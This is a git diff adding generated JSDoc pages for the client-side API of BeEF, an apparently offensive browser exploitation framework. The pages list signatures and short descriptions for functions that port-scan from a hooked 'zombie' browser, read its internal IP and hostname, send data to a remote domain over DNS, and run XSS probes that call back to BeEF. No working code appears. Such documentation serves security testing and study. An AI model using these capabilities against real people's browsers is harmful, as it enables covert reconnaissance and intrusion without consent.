href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

325
docs/beef.net.dns.html Normal file
View File

@@ -0,0 +1,325 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: dns</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: dns</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>dns</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>request object structure:</p>
<ul>
<li>msgId: {Integer} Unique message ID for the request.</li>
<li>domain: {String} Remote domain to retrieve the data.</li>
<li>wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED</li>
<li>callback: {Function} Callback function to receive the number of requests sent.</li>
</ul></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_dns.js.html">net/dns.js</a>, <a href="net_dns.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".send"><span class="type-signature">(static) </span>send<span class="signature">(msgId, data, domain, callback)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>msgId</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>data</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>domain</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_dns.js.html">net/dns.js</a>, <a href="net_dns.js.html#line27">line 27</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

2388
docs/beef.net.html Normal file
View File

File diff suppressed because it is too large Load Diff

449
docs/beef.net.local.html Normal file
View File

@@ -0,0 +1,449 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: local</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: local</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>local</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides networking functions for the local/internal network of the zombie.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".getLocalAddress"><span class="type-signature">(static) </span>getLocalAddress<span class="signature">()</span><span class="type-signature"> &rarr; {String}</span></h4>
<div class="description">
<p>Returns the internal IP address of the zombie.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line54">line 54</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the internal ip of the zombie.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".getLocalHostname"><span class="type-signature">(static) </span>getLocalHostname<span class="signature">()</span><span class="type-signature"> &rarr; {String}</span></h4>
<div class="description">
<p>Returns the internal hostname of the zombie.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line72">line 72</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the internal hostname of the zombie.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h4 class="name" id=".initializeSocket"><span class="type-signature">(static) </span>initializeSocket<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Initializes the java socket. We have to use this method because
some browsers do not have java installed or it is not accessible.
in which case creating a socket directly generates an error. So this code
is invalid:
sock: new java.net.Socket();</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_local.js.html">net/local.js</a>, <a href="net_local.js.html#line24">line 24</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

504
docs/beef.net.portscanner.html Normal file
View File

@@ -0,0 +1,504 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: portscanner</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: portscanner</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>portscanner</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides port scanning functions for the zombie. A mod of pdp's scanner</p>
<p>Version: '0.1',
author: 'Petko Petkov',
homepage: 'http://www.gnucitizen.org'</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_portscanner.js.html">net/portscanner.js</a>, <a href="net_portscanner.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".scanPort"><span class="type-signature">(static) </span>scanPort<span class="signature">(callback, target, port, timeout)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>target</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>port</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_portscanner.js.html">net/portscanner.js</a>, <a href="net_portscanner.js.html#line25">line 25</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".scanTarget"><span class="type-signature">(static) </span>scanTarget<span class="signature">(callback, target, ports_str, timeout)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>target</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>ports_str</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_portscanner.js.html">net/portscanner.js</a>, <a href="net_portscanner.js.html#line54">line 54</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

277
docs/beef.net.requester.html Normal file
View File

@@ -0,0 +1,277 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: requester</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: requester</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>requester</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>request object structure:</p>
<ul>
<li>method: {String} HTTP method to use (GET or POST).</li>
<li>host: {String} hostname</li>
<li>query_string: {String} The query string is a part of the URL which is passed to the program.</li>
<li>uri: {String} The URI syntax consists of a URI scheme name.</li>
<li>headers: {Array} contain the operating parameters of the HTTP request.</li>
</ul></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_requester.js.html">net/requester.js</a>, <a href="net_requester.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".send"><span class="type-signature">(static) </span>send<span class="signature">(requests_array)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>requests_array</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_requester.js.html">net/requester.js</a>, <a href="net_requester.js.html#line23">line 23</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

773
docs/beef.net.xssrays.html Normal file
View File

@@ -0,0 +1,773 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: xssrays</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: xssrays</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>xssrays</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>XssRays 0.5.5 ported to BeEF by Michele &quot;antisnatchor&quot; Orru'
The XSS detection mechanisms has been rewritten from scratch: instead of using the location hash trick (that doesn't work anymore),
if the vulnerability is triggered the JS code vector will contact back BeEF.
Other aspects of the original code have been simplified and improved.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line29">line 29</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".checkBrowser"><span class="type-signature">(static) </span>checkBrowser<span class="signature">(vector_array_index)</span><span class="type-signature"></span></h4>
<div class="description">
<p>return true is the attack vector can be launched to the current browser type.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>vector_array_index</code></td>
<td class="type">
<span class="param-type">array</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line80">line 80</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".run"><span class="type-signature">(static) </span>run<span class="signature">(url, method, vector, params, urlencode)</span><span class="type-signature"></span></h4>
<div class="description">
<p>this is the main core function with the detection mechanisms...</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>url</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>method</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>vector</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>params</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>urlencode</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line306">line 306</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".runJobs"><span class="type-signature">(static) </span>runJobs<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>run the jobs (run functions added to the stack), and clean the shit (iframes) from the DOM after a timeout value</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line453">line 453</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".startScan"><span class="type-signature">(static) </span>startScan<span class="signature">(xssraysScanId, hookedBrowserSession, beefUrl, crossDomain, timeout)</span><span class="type-signature"></span></h4>
<div class="description">
<p>main function, where all starts :-)</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>xssraysScanId</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>hookedBrowserSession</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>beefUrl</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>crossDomain</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_xssrays.js.html">net/xssrays.js</a>, <a href="net_xssrays.js.html#line116">line 116</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

4198
docs/beef.os.html Normal file
View File

File diff suppressed because it is too large Load Diff

400
docs/beef.session.html Normal file
View File

@@ -0,0 +1,400 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: session</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: session</h1>
<section>
<header>
<h2>session</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides basic session functions.</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".gen_hook_session_id"><span class="type-signature">(static) </span>gen_hook_session_id<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Generates a random string using the chars in hook_session_id_chars.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line60">line 60</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".get_hook_session_id"><span class="type-signature">(static) </span>get_hook_session_id<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Gets a string which will be used to identify the hooked browser session</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line23">line 23</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".set_hook_session_id"><span class="type-signature">(static) </span>set_hook_session_id<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Sets a string which will be used to identify the hooked browser session</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="session.js.html">session.js</a>, <a href="session.js.html#line48">line 48</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

226
docs/beef.timeout.html Normal file
View File

@@ -0,0 +1,226 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: timeout</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: timeout</h1>
<section>
<header>
<h2>timeout</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-origin situations,
for example calling the hook with jquery getScript,
or sometimes with event handler injections).</p>
<p>To fix this, we call again beef_init after 1 second.
Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
antisnatchor</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="timeout.js.html">timeout.js</a>, <a href="timeout.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".setTimeout"><span class="type-signature">(static) </span>setTimeout<span class="signature">()</span><span class="type-signature"></span></h4>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="timeout.js.html">timeout.js</a>, <a href="timeout.js.html#line19">line 19</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
